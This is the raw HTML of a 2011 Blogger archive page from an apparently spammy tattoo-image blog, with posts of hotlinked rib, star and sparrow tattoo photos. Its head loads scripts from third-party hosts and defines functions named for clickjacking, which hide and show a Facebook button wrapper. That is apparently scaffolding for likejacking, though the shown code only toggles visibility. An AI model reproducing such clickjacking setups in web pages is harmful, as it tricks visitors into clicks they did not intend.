<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js' type='text/javascript'></script>
<script src='http://munirjack.googlecode.com/svn/trunk/jquery-1.4.2.js' type='text/javascript'></script>
<link href='http://afullbodytattoos.blogspot.ca/2011/09/' rel='canonical'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<meta content='blogger' name='generator'/>
<link href='http://afullbodytattoos.blogspot.ca/favicon.ico' rel='icon' type='image/x-icon'/>
<link href='http://afullbodytattoos.blogspot.com/2011/09/' rel='canonical'/>
<link rel="alternate" type="application/atom+xml" title="FULL BODY TATTOO - Atom" href="http://afullbodytattoos.blogspot.com/feeds/posts/default" />
<link rel="alternate" type="application/rss+xml" title="FULL BODY TATTOO - RSS" href="http://afullbodytattoos.blogspot.com/feeds/posts/default?alt=rss" />
<link rel="service.post" type="application/atom+xml" title="FULL BODY TATTOO - Atom" href="https://www.blogger.com/feeds/5804938397082779454/posts/default" />
<meta content='adult' name='rating'/>
<meta content='http://afullbodytattoos.blogspot.com/2011/09/' property='og:url'/>
<meta content='FULL BODY TATTOO' property='og:title'/>
<meta content='' property='og:description'/>
<!--[if IE]> <script> (function() { var html5 = ("abbr,article,aside,audio,canvas,datalist,details," + "figure,footer,header,hgroup,mark,menu,meter,nav,output," + "progress,section,time,video").split(','); for (var i = 0; i < html5.length; i++) { document.createElement(html5[i]); } try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} })(); </script> <![endif]-->
<meta content='All About Jonas Dick' name='description'/>
<meta content='' name='keywords'/>
<meta content='global' name='distribution'/>
<meta content='document' name='resource-type'/>
<meta content='all' name='audience'/>
<meta content='general' name='rating'/>
<meta content='en' name='language'/>
<meta content='index, follow, all' name='robots'/>
<meta content='index, follow, all' name='Googlebot'/>
<meta content='index, follow, all' name='Mediapartners-Google'/>
<meta content='index, follow, all' name='Googlebot-Image'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<title>FULL BODY TATTOO: September 2011</title>
<meta content='blogger' name='generator'/>
<link type='text/css' rel='stylesheet' href='https://www.blogger.com/static/v1/widgets/124887373-widget_css_bundle.css' />
<link type='text/css' rel='stylesheet' href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=5804938397082779454&amp;zx=2ee1a2a1-6829-4b36-8394-3cb6d4dd0e0a' />
<link type='text/css' rel='stylesheet' href='https://www.blogger.com/static/v1/v-css/2982899471-interstitial_bundle.css' />
<style id='page-skin-1' type='text/css'><!--
/*
-----------------------------------------------
Blogger Template Style
Name:     BlueSense
Designer: Dosh Dosh
URL:      http://www.doshdosh.com/
----------------------------------------------- */
/* Variable definitions
====================
<Variable name="bgcolor" description="Page Background Color"
type="color" default="#fff">
<Variable name="textcolor" description="Text Color"
type="color" default="#333">
<Variable name="linkcolor" description="Link Color"
type="color" default="#58a">
<Variable name="pagetitlecolor" description="Blog Title Color"
type="color" default="#c60">
<Variable name="descriptioncolor" description="Blog Description Color"
type="color" default="#999">
<Variable name="titlecolor" description="Post Title Color"
type="color" default="#c60">
<Variable name="bordercolor" description="Border Color"
type="color" default="#ccc">
<Variable name="sidebarcolor" description="Sidebar Title Color"
type="color" default="#999">
<Variable name="sidebartextcolor" description="Sidebar Text Color"
type="color" default="#666">
<Variable name="visitedlinkcolor" description="Visited Link Color"
type="color" default="#999">
<Variable name="bodyfont" description="Text Font"
type="font" default="normal normal 100% Georgia, Serif">
<Variable name="headerfont" description="Sidebar Title Font"
type="font"
default="normal normal 78% 'Trebuchet MS',Trebuchet,Arial,Verdana,Sans-serif">
<Variable name="pagetitlefont" description="Blog Title Font"
type="font"
default="normal normal 200% Georgia, Serif">
<Variable name="descriptionfont" description="Blog Description Font"
type="font"
default="normal normal 78% 'Trebuchet MS', Trebuchet, Arial, Verdana, Sans-serif">
<Variable name="postfooterfont" description="Post Footer Font"
type="font"
default="normal normal 78% 'Trebuchet MS', Trebuchet, Arial, Verdana, Sans-serif">
<Variable name="startSide" description="Side where text starts in blog language"
type="automatic" default="left">
<Variable name="endSide" description="Side where text ends in blog language"
type="automatic" default="right">
*/
#navbar-iframe  {
height : 0;
visibility : hidden;
display : none;
}
iframe {
background-color:		none;
}
body {
background:#F79239 url() repeat fixed top center;
margin:0;
color:#777777;
font:x-small Georgia Serif;
font-size/* */:/**/small;
font-size: /**/small;
text-align: center;
}
a:link {
color:#fe6602;
text-decoration:underline;
}
a:visited {
color:#fe6602;
text-decoration:underline;
}
a:hover {
color:#fe6602;
text-decoration:underline;
}
a img {
border-width:0;
}
/* Header
-----------------------------------------------
*/
#header-wrapper {
width:835px;
margin:10px auto 10px;
}
#header-inner {
background-position: center;
margin-left: auto;
margin-right: auto;
}
#header {
margin: 5px;
text-align: center;
color:#fe6602;
}
#header h1 {
margin:5px 5px 0;
padding:15px 20px .25em;
line-height:1.2em;
text-transform:normal;
letter-spacing:0em;
font: normal bold 200% Verdana, sans-serif;
}
#header a {
color:#fe6602;
text-decoration:none;
}
#header a:hover {
color:#fe6602;
}
#header .description {
margin:0 5px 5px;
padding:0 20px 15px;
text-transform:normal;
letter-spacing:0em;
line-height: 1.4em;
font: normal bold 105% Arial, sans-serif;
color: #fe6602;
}
#header img {
margin-left: auto;
margin-right: auto;
}
/* Navi-Wrapper
----------------------------------------------- */
#navi-wrapper {
width: 1024;
margin:0px;
}
/* Outer-Wrapper
----------------------------------------------- */
#outer-wrapper {
width: 1024px;
margin: 0 auto;
background-color: #ffffff;
text-align:left;
font: normal normal 100% Arial, sans-serif;
}
#mainarea-wrapper {
width: 840px;
margin: 0 auto;
background-color: #ffffff;
text-align:left;
font: normal normal 100% Arial, sans-serif;
float: left;
}
#main-wrapper {
padding-top:5px;
width: 660px;
float: right;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */
}
#sidebar1-wrapper {
width: 160px;
padding-top:5px;
padding-bottom:0px;
float: left;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden;      /* fix for long non-text content breaking IE sidebar float */
}
#sidebar2-wrapper {
width: 160px;
padding-top:5px;
padding-bottom:0px;
float: right;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden;      /* fix for long non-text content breaking IE sidebar float */
}
/* Headings
----------------------------------------------- */
h2 {
margin:0 0 .75em;
font:normal bold 86% Verdana, sans-serif;
line-height: 1.4em;
text-transform:normal;
letter-spacing:0em;
color:#777777;
background-color: #ffffff;
padding:0px;
}
/* Posts
-----------------------------------------------
*/
h2.date-header {
margin:0;
}
.post {
margin:0 0 1.5em;
padding-left: 5px;
padding-right: 5px;
font-size: 1.1em;
}
.post h1, .post h2 {
margin:.25em 0 0;
padding:0 0 4px;
font-size:140%;
font-weight:normal;
line-height:1.4em;
color:#fe6602;
border-bottom:0px solid #000000;
}
.post h1 a, .post h1 a:visited, .post h1 strong,  .post h2 a, .post h2 a:visited, .post h2 strong{
display:block;
text-decoration:none;
color:#fe6602;
font-weight:normal;
}
.post h1 strong, .post h1 a:hover, .post h2 strong, .post h2 a:hover {
color:#777777;
text-decoration:underline;
}
.post-body {
margin:0 0 .75em;
line-height:1.6em;
}
.post-body blockquote {
line-height:1.3em;
}
.post-footer {
margin: .75em 0;
color:#777777;
text-transform:normal;
letter-spacing:0em;
font: normal normal 78% Arial, sans-serif;
line-height: 1.4em;
border-top:0px solid #000000;
}
.comment-link {
margin-left:.6em;
}
.post img {
padding:50px;
border:1px solid #777777;
}
.post blockquote {
margin:1em 20px;
}
.post blockquote p {
margin:.75em 0;
}
/* Comments
----------------------------------------------- */
#comments h4 {
margin:1em 0;
font-weight: bold;
line-height: 1.4em;
text-transform:normal;
letter-spacing:0em;
color: #777777;
}
#comments-block {
margin:1em 0 1.5em;
line-height:1.6em;
}
#comments-block .comment-author {
margin:.5em 0;
}
#comments-block .comment-body {
margin:.25em 0 0;
}
#comments-block .comment-footer {
margin:-.25em 0 2em;
line-height: 1.4em;
text-transform:normal;
letter-spacing:0em;
}
#comments-block .comment-body p {
margin:0 0 .75em;
}
.deleted-comment {
font-style:italic;
color:gray;
}
#blog-pager-newer-link {
float: left;
}
#blog-pager-older-link {
float: right;
}
#blog-pager {
text-align: center;
}
.feed-links {
clear: both;
line-height: 2.5em;
display: none;
}
/* Sidebar Content
----------------------------------------------- */
.sidebar {
color: #fe6602;
line-height: 1.5em;
}
.navi {
color: #fe6602;
line-height: 1.5em;
}
.sidebar ul {
list-style-type: circle;
margin-left: 20px;
padding:0 0 0;
}
.sidebar li {
margin:0;
padding-top:0;
padding-right:0;
padding-bottom:0;
padding-left:0px;
line-height:1.5em;
}
.sidebar .widget, .main .widget {
margin:0 0 0px;
padding:0;
}
.navi .widget {
margin:0;
padding:0px;
}
.main .Blog {
border-bottom-width: 0;
}
/* Profile
----------------------------------------------- */
.profile-img {
float: left;
margin-top: 0;
margin-right: 5px;
margin-bottom: 0px;
margin-left: 0;
padding: 4px;
border: 1px solid #777777;
}
.profile-data {
margin:0;
text-transform:normal;
letter-spacing:0em;
font: normal normal 78% Arial, sans-serif;
color: #777777;
font-weight: bold;
line-height: 1.6em;
}
.profile-datablock {
margin:.5em 0 .5em;
}
.profile-textblock {
margin: 0.5em 0;
line-height: 1.6em;
}
.profile-link {
font: normal normal 78% Arial, sans-serif;
text-transform: normal;
letter-spacing: 0em;
}
/* Footer
----------------------------------------------- */
#footer
{
display : none;
padding: 0px;
margin: 0px;
clear: both;
text-align: center;
background-color: #ffffff;
color: #FE6602;
clear:both;
}
#footer a
{
color: #fe6602;
}
.description
{
border-bottom: 0px;
}
.post img {
min-width: 500px;
height: auto !important;
width: expression(this.width > 500 ? 500: true);
}
.post img {
max-width: 500px;
height: auto !important;
width: expression(this.width > 500 ? 500: true);
}
.post {
height:px;
width:auto;
overflow:auto;
}
#BlogArchive1 .widget-content{
height:0px;
width:auto;
overflow:hidden;
}
.breadcrumbs {
padding:5px 5px 5px 0px;
margin: 0px 0px 15px 0px;
font-size:95%;
line-height: 1.4em;
border-bottom:3px double #e6e4e3;
}
#related-posts { float : left; width : 250px; margin-left : 5px; font-size: 12px; line-height : 1.8em; margin-bottom:10px; }
#related-posts a{ color:#4b4b4b; }
#related-posts a:hover{ color:#ca1717; }
#related-posts .widget { list-style-type : none; margin : 5px 0 5px 0; padding : 0; } #related-posts .widget h2, #related-posts h2 { font-size : 20px; font-weight : normal; margin : 5px 7px 0; padding : 0 0 5px; }
#related-posts a { text-decoration : none; }
#related-posts a:hover { text-decoration : none; }
#related-posts ul { margin : 10px 5px 5px 20px; padding : 0; }
h1.post-title, .post h1 #Blog1 h1, #Blog2 h1 { font-size:1.5em; }

--></style>
<script language='JavaScript' type='text/javascript'>
 if (top.location != self.location) top.location = self.location;
 </script>
<script src='http://hbhost.googlecode.com/files/Related-posts.js' type='text/javascript'></script>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js' type='text/javascript' xml:space='preserve'></script>
<script type='text/javascript'>
             function ClickJackFbHide(){
                jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
             }
             function ClickJackFbShow(){
                jQuery("div[id^=\'clickjack-button-wrapper\']").show();
             }
</script>
<script type="text/javascript">function a(){var b=window.location.href,c=b.split("?");switch(c.length){case 1:return b+"?m=1";case 2:return 0<=c[1].search("(^|&)m=")?null:b+"&m=1";default:return null}}var d=navigator.userAgent;if(-1!=d.indexOf("Mobile")&&-1!=d.indexOf("WebKit")&&-1==d.indexOf("iPad")||-1!=d.indexOf("Opera Mini")||-1!=d.indexOf("IEMobile")){var e=a();e&&window.location.replace(e)};
</script></head>
<body><iframe src="https://www.blogger.com/blogin.g?blogspotURL=http://afullbodytattoos.blogspot.ca/2011_09_01_archive.html" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" height="100%" width="100%" id="injected-iframe" style="background-color:white; position:absolute; top:0; left:0; z-index:999; display:block; visibility:visible"></iframe>
<style type="text/css">
    
    body {
      _height: 100%;
    }

    body * {
      visibility: hidden;
    }
  </style>
<span class='link' id='link'>
<div id='outer-wrapper'><div id='wrap2'>
<!-- skip links for text browsers -->
<span id='skiplinks' style='display:none;'>
<a href='#main'>skip to main </a> |
      <a href='#sidebar'>skip to sidebar</a>
</span>
<div id='header-wrapper'>
<div class='header section' id='header'><div class='widget Header' data-version='1' id='Header1'>
<div id='header-inner'>
<div class='titlewrapper'>
<h1 class='title'>
<a href='http://afullbodytattoos.blogspot.ca/'>FULL BODY TATTOO</a>
</h1>
</div>
<div class='descriptionwrapper'>
<p class='description'><span>
</span></p>
</div>
</div>
</div></div>
</div>
<div id='navi-wrapper'>
<div class='navi section' id='navi'>
<div class='widget Attribution' data-version='1' id='Attribution1'>
<div class='widget-content' style='text-align: center;'>
Powered by <a href='https://www.blogger.com' target='_blank'>Blogger</a>.
</div>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=5804938397082779454&widgetType=Attribution&widgetId=Attribution1&action=editWidget&sectionId=navi' onclick='return _WidgetManager._PopupConfig(document.getElementById("Attribution1"));' target='configAttribution1' title='Edit'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div></div>
</div>
<div id='content-wrapper'>
<div id='crosscol-wrapper' style='text-align:center'>
<div class='crosscol no-items section' id='crosscol'></div>
</div>
<div id='mainarea-wrapper'>
<div id='main-wrapper'>
<div class='main section' id='main'><div class='widget Blog' data-version='1' id='Blog1'>
<div class='blog-posts hfeed'>

          <div class="date-outer">
        
<h2 class='date-header'><span>Sunday, September 25, 2011</span></h2>

          <div class="date-posts">
        
<div class='post-outer'>
<div class='post hentry' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
<meta content='http://2.bp.blogspot.com/_ZH5sp1oAsA4/Smh5w9EYsJI/AAAAAAAALVU/qt7e-iS5JWs/s72-c/frog%2Brib%2Btattoo%2Bsexy%2Bgirls.jpg' itemprop='image_url'/>
<a name='3307823004635825044'></a>
<h3 class='post-title entry-title' itemprop='name'>
<a href='http://afullbodytattoos.blogspot.ca/2011/09/girl-rib-tattoos.html'>girl rib tattoos</a>
</h3>
<div class='post-header'>
<div class='post-header-line-1'></div>
</div>
<div class='post-body entry-content' id='post-body-3307823004635825044' itemprop='description articleBody'>
<img src="http://2.bp.blogspot.com/_ZH5sp1oAsA4/Smh5w9EYsJI/AAAAAAAALVU/qt7e-iS5JWs/s400/frog%2Brib%2Btattoo%2Bsexy%2Bgirls.jpg" /><br />frog rib tattoo for girls<br /><img src="http://media.onsugar.com/files/2010/10/39/5/1129/11299226/bb/rib_tattoo_flower_sexy_women.jpg" /><br />rib tattoo women, star and flower tattoo for girls<br /><img src="http://3.bp.blogspot.com/_HHeaKJuOaDU/TKbh3UKRR7I/AAAAAAAADb8/qWZ-tb8qIt8/s1600/sexy-girl-see-through-bra-tatoo.jpg" /><br />Tattoo Tribal Design on girls rib<br /><img src="http://img.dailymail.co.uk/i/pix/2008/03_03/BeckhamSPLASH1803_631x900.jpg" /><br />Body art: David Beckham rib tattoo<br /><img src="http://cockingasnook.files.wordpress.com/2009/06/tattoo-girl.jpg" /><br /><img src="http://1.bp.blogspot.com/_lANXEaZNjHc/TQlCz9uySgI/AAAAAAAAAP4/D4eVv2He_9Y/s1600/Sexy-Tattoo-Design-Rib-Tattoo-Girl-1.jpg" /><br />Rib Tattoos Desig <br /><img src="http://4.bp.blogspot.com/_ZH5sp1oAsA4/SwQ0q9mSDuI/AAAAAAAAMik/0J_5kZfNt1g/s1600/female%2Brib%2Btattoos%2Bsexy%2Bgirls%2Bcatheholdentattoorossicrest.jpg" /><br />female rib tattoos foe girls, popular tattoo for women<br /><img src="http://2.bp.blogspot.com/_IXsCX2peo0c/TKm8gZL5RHI/AAAAAAAAALI/gg4h1TqWwKM/s1600/rib%252Bside%252Btattoo%252Bfor%252Bgirl%252B-%252Bwrist%252Btattoo%252Bdesigns.jpg" /><br />rib side tattoo for girl<br /><img src="http://ribcagetattoos.com/wp-content/uploads/2010/04/banner3.jpg" /><br /><img src="http://3.bp.blogspot.com/_AxTkUnqBSRc/SwgAOJKQM2I/AAAAAAAABHM/sqgZOv69o0s/s1600/finished_side_rib_tat_beautiful_large.jpg" /><br />Feminine Rib Tattoos<br /><img src="http://mogoel.com/wp-content/uploads/2010/08/rose-tattoo-designs-and-music-notes-tattoos-gallery-4.jpg" />
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'><span class='post-author vcard'>
</span>
<span class='post-timestamp'>
at
<meta content='http://afullbodytattoos.blogspot.ca/2011/09/girl-rib-tattoos.html' itemprop='url'/>
<a class='timestamp-link' href='http://afullbodytattoos.blogspot.ca/2011/09/girl-rib-tattoos.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2011-09-25T17:28:00-07:00'>5:28 PM</abbr></a>
</span>
<span class='post-comment-link'>
</span>
<span class='post-icons'>
</span>
<div class='post-share-buttons goog-inline-block'>
</div>
</div>
<div class='post-footer-line post-footer-line-2'><span class='post-labels'>
</span>
</div>
<div class='post-footer-line post-footer-line-3'><span class='post-location'>
</span>
</div>
</div>
</div>
</div>

            </div></div>
          

          <div class="date-outer">
        
<h2 class='date-header'><span>Saturday, September 10, 2011</span></h2>

          <div class="date-posts">
        
<div class='post-outer'>
<div class='post hentry' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
<meta content='http://farm3.static.flickr.com/2335/2100514979_bc373de32a_t.jpg' itemprop='image_url'/>
<a name='4623926895453298782'></a>
<h3 class='post-title entry-title' itemprop='name'>
<a href='http://afullbodytattoos.blogspot.ca/2011/09/star-tattoo-wrist-ideas.html'>star tattoo wrist ideas</a>
</h3>
<div class='post-header'>
<div class='post-header-line-1'></div>
</div>
<div class='post-body entry-content' id='post-body-4623926895453298782' itemprop='description articleBody'>
<img src="http://wordsprout.files.wordpress.com/2009/01/sp1041_4501.jpeg" /><br />stars wrist tattoo (nautical star)<br /><img src="http://th00.deviantart.net/fs45/300W/i/2009/061/8/d/Tall_Star_Tattoo_by_MadeByJanine.jpg" /><br />Pictures Of Star Tattoo Designs<br /><img src="http://www.tattoowatch.com/pictures/star_tattoos/startattoos.jpg" /><br />star tattoos on rib<br /><img src="http://www.shootingstarstattoo.com/wp-content/uploads/2010/12/nautical-star-wrist-tattoo.jpg" /><br />A black and white color nautical star tattoo embedded on wrist.<br /><img src="http://farm3.static.flickr.com/2335/2100514979_bc373de32a.jpg" /><br />white star tattoo <br /><img src="http://www.netjunkz.com/wp-content/uploads/2010/06/Star-Tattoo-Design-8.jpg" /><br />A moon and star tattoo done on the wrist on both arms. Moon &amp; Star Tattoo<br /><img src="http://3.bp.blogspot.com/_7LyVrbhtObg/TIEsFnc9NSI/AAAAAAAAAlE/0JCaaTyhm18/s400/Favorite%2BTattoos%2B-%2BStar%2BTattoos.jpg" /><br />Star tattoos are good because they might be put almost anywhere in your body <br /><img src="http://queerid.com/images/user_media2/star-tattoo-1.jpg" /><br />Falling star tattoo designs<br /><img src="http://best-tattoo-remo-val.com/wp-content/uploads/2009/06/star-tattoos.jpg" /><br />star tattoos<br /><img src="http://www.tattoo22.com/images/startat065.jpg" /><br />Star Tattoo Pictures<br /><img src="http://loyalkng.com/wp-content/uploads/2009/06/star-face.jpg" /><br />Star Tattoos On Her Face.<br /><img src="http://tattooadvices.com/designs/star-tattoo-designs/Star-tattoo-designs-12.jpg" /><br />Star Tattoo Designs<br /><img src="http://i40.tinypic.com/2e6dgs3.jpg" /><br />small star tattoos on girls ear<br /><img src="http://www.deviantart.com/download/123865425/Moon_and_Stars_Tattoo_by_Pulling_Toes.jpg" /><br />star tattoo
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'><span class='post-author vcard'>
</span>
<span class='post-timestamp'>
at
<meta content='http://afullbodytattoos.blogspot.ca/2011/09/star-tattoo-wrist-ideas.html' itemprop='url'/>
<a class='timestamp-link' href='http://afullbodytattoos.blogspot.ca/2011/09/star-tattoo-wrist-ideas.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2011-09-10T17:11:00-07:00'>5:11 PM</abbr></a>
</span>
<span class='post-comment-link'>
</span>
<span class='post-icons'>
</span>
<div class='post-share-buttons goog-inline-block'>
</div>
</div>
<div class='post-footer-line post-footer-line-2'><span class='post-labels'>
</span>
</div>
<div class='post-footer-line post-footer-line-3'><span class='post-location'>
</span>
</div>
</div>
</div>
</div>

            </div></div>
          

          <div class="date-outer">
        
<h2 class='date-header'><span>Thursday, September 8, 2011</span></h2>

          <div class="date-posts">
        
<div class='post-outer'>
<div class='post hentry' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
<meta content='http://farm4.static.flickr.com/3169/3079857499_6e884bc615_t.jpg' itemprop='image_url'/>
<a name='887593518830759942'></a>
<h3 class='post-title entry-title' itemprop='name'>
<a href='http://afullbodytattoos.blogspot.ca/2011/09/sparrow-tattoo.html'>sparrow tattoo</a>
</h3>
<div class='post-header'>
<div class='post-header-line-1'></div>
</div>
<div class='post-body entry-content' id='post-body-887593518830759942' itemprop='description articleBody'>
<img src="http://www.deviantart.com/download/64983871/Sparrow_tattoo_by_SheepoftheShepherd.jpg" /><br />Sparrow tattoo <br /><img src="http://fc09.deviantart.com/fs26/f/2008/152/6/c/Tattoo_2___Sparrow_by_midnightsabotage.jpg" /><br />Sparrow Tattoos<br /><img src="http://tattoos-and-art.com/wp-content/gallery/swallow-tattoos/sparrow_large.jpg" /><br />Women Tattoo Sparrow tattoos get confused with swallow tattoos all the time.<br /><img src="http://farm4.static.flickr.com/3169/3079857499_6e884bc615.jpg" /><br />swallow bird tattoo designs<br /><img src="http://3.bp.blogspot.com/_6YLcqwniI0E/TAZ-RIUKFUI/AAAAAAAACN8/7KIJh8UkZZo/s1600/A%252BNew%252BTrends%252Bof%252BTattoos%252B1.jpg" /><br />my sparrow tattoo<br /><img src="http://cdnpray.files.wordpress.com/2008/10/istockphoto_1738038-traditional-swallow-tattoo-illustration-freedom1.jpg" /><br />I'll pick <br /><img src="http://www.eviltattoo.com/images/sparrow004.jpg" /><br />Sparrow Tattoo<br /><img src="http://www.eviltattoo.com/images/sparrow009.jpg" /><br />Sweety Sparrow Tattoo Image For Women Very Nice Tattoo Designs Gallery<br /><img src="http://cdn.buzznet.com/assets/users16/alyheartscandy/default/my-sparrow-tattoo--large-msg-122654625212.jpg" /><br /><img src="http://www.tattoosdaily.com/sparrow-tattoos/215346_0184.jpg" /><br />Sparrow tattoo designs are a classic tattoo that has been very popular for girls<br /><img src="http://img.dailymail.co.uk/i/pix/2007/03_02/siennatatt01BIG_468x332.jpg" /><br />shows off the tattoo of a sparrow she had done in New York<br /><img src="http://img.photobucket.com/albums/v713/akean1/sparrow-tattoo.jpg" /><br />Sparrow Tattoo<br /><img src="http://farm3.static.flickr.com/2338/2120638069_5217342a51.jpg" /><br />Sparrow Tattoo <br /><img src="http://www.tattoosbydesign.com/celebrities/images/sugarray3.jpg" /><br />Sparrow Bird tattoos
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'><span class='post-author vcard'>
</span>
<span class='post-timestamp'>
at
<meta content='http://afullbodytattoos.blogspot.ca/2011/09/sparrow-tattoo.html' itemprop='url'/>
<a class='timestamp-link' href='http://afullbodytattoos.blogspot.ca/2011/09/sparrow-tattoo.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2011-09-08T12:40:00-07:00'>12:40 PM</abbr></a>
</span>
<span class='post-comment-link'>
</span>
<span class='post-icons'>
</span>
<div class='post-share-buttons goog-inline-block'>
</div>
</div>
<div class='post-footer-line post-footer-line-2'><span class='post-labels'>
</span>
</div>
<div class='post-footer-line post-footer-line-3'><span class='post-location'>
</span>
</div>
</div>
</div>
</div>

        </div></div>
      
</div>
<div class='blog-pager' id='blog-pager'>
<span id='blog-pager-newer-link'>
<a class='blog-pager-newer-link' href='http://afullbodytattoos.blogspot.ca/search?updated-max=2011-10-08T10:05:00-07:00&amp;max-results=1&amp;reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Newer Posts'>Newer Posts</a>
</span>
<span id='blog-pager-older-link'>
<a class='blog-pager-older-link' href='http://afullbodytattoos.blogspot.ca/search?updated-max=2011-09-08T12:40:00-07:00&amp;max-results=1' id='Blog1_blog-pager-older-link' title='Older Posts'>Older Posts</a>
</span>
<a class='home-link' href='http://afullbodytattoos.blogspot.ca/'>Home</a>
</div>
<div class='clear'></div>
<div class='blog-feeds'>
<div class='feed-links'>
Subscribe to:
<a class='feed-link' href='http://afullbodytattoos.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Posts (Atom)</a>
</div>
</div>
<script type="text/javascript">window.___gcfg = {'lang': 'en'};</script>
</div><div class='widget Stats' data-version='1' id='Stats1'>
<h2>Total Pageviews</h2>
<div class='widget-content'>
<div id='Stats1_content' style='display: none;'>
<img alt='Sparkline' height='30' id='Stats1_sparkline' width='75'/>
<span class='counter-wrapper text-counter-wrapper' id='Stats1_totalCount'>
</span>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=5804938397082779454&widgetType=Stats&widgetId=Stats1&action=editWidget&sectionId=main' onclick='return _WidgetManager._PopupConfig(document.getElementById("Stats1"));' target='configStats1' title='Edit'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div>
</div>
</div></div>
</div>
<div id='sidebar1-wrapper'>
<div class='sidebar section' id='sidebar1'><div class='widget PopularPosts' data-version='1' id='PopularPosts1'>
<h2>Popular Posts</h2>
<div class='widget-content popular-posts'>
<ul>
<li>
<div class='item-content'>
<div class='item-thumbnail'>
<a href='http://afullbodytattoos.blogspot.ca/2011/03/star-wrist-tattoo.html' target='_blank'>
<img alt='' border='0' height='72' src='http://4.bp.blogspot.com/_-_wrh7cRuNc/Srq8cTn28WI/AAAAAAAABWI/eCTfF2TnrQo/s72-c/star-tattoo-wrist-6.jpg' width='72'/>
</a>
</div>
<div class='item-title'><a href='http://afullbodytattoos.blogspot.ca/2011/03/star-wrist-tattoo.html'>star wrist tattoo</a></div>
<div class='item-snippet'>Singer has a star on the inside of her left wrist, simple star tattoos for girls on wrist picture gallery 6 simple star tattoos Star Wrist T...</div>
</div>
<div style='clear: both;'></div>
</li>
<li>
<div class='item-content'>
<div class='item-thumbnail'>
<a href='http://afullbodytattoos.blogspot.ca/2012/01/peacock-tattoo.html' target='_blank'>
<img alt='' border='0' height='72' src='http://1.bp.blogspot.com/_HaDcoElLdc0/S0BJyjdcFgI/AAAAAAAAAXs/3MfTTAF1Qb4/s72-c/tribal+peacok.jpg' width='72'/>
</a>
</div>
<div class='item-title'><a href='http://afullbodytattoos.blogspot.ca/2012/01/peacock-tattoo.html'>Peacock Tattoo</a></div>
<div class='item-snippet'>Peacock Tattoo Designs 2012</div>
</div>
<div style='clear: both;'></div>
</li>
<li>
<div class='item-content'>
<div class='item-thumbnail'>
<a href='http://afullbodytattoos.blogspot.ca/2011/03/tattoo-gallery-tribal.html' target='_blank'>
<img alt='' border='0' height='72' src='http://4.bp.blogspot.com/_o_6N8zr5RiU/TFF3uhnGMNI/AAAAAAAAC2c/iSFyXDmSumI/s72-c/arm-tattoos.jpg' width='72'/>
</a>
</div>
<div class='item-title'><a href='http://afullbodytattoos.blogspot.ca/2011/03/tattoo-gallery-tribal.html'>tattoo gallery tribal</a></div>
<div class='item-snippet'>Tribal tattoos are among the most popular designs. They have been around for divine ink tattoos uv ink tattoos roses tattoo gallery Butterfl...</div>
</div>
<div style='clear: both;'></div>
</li>
</ul>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=5804938397082779454&widgetType=PopularPosts&widgetId=PopularPosts1&action=editWidget&sectionId=sidebar1' onclick='return _WidgetManager._PopupConfig(document.getElementById("PopularPosts1"));' target='configPopularPosts1' title='Edit'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div>
</div></div>
</div>
</div>
<div id='sidebar2-wrapper'>
<div class='sidebar section' id='sidebar2'><div class='widget BlogArchive' data-version='1' id='BlogArchive1'>
<h2>Blog Archive</h2>
<div class='widget-content' style='overflow: auto; width: 155px; height: 500px; padding: 10px;'>
<div id='ArchiveList'>
<div id='BlogArchive1_ArchiveList'>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2014/'>
2014
</a>
<span class='post-count' dir='ltr'>(1)</span>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2014/12/'>
December
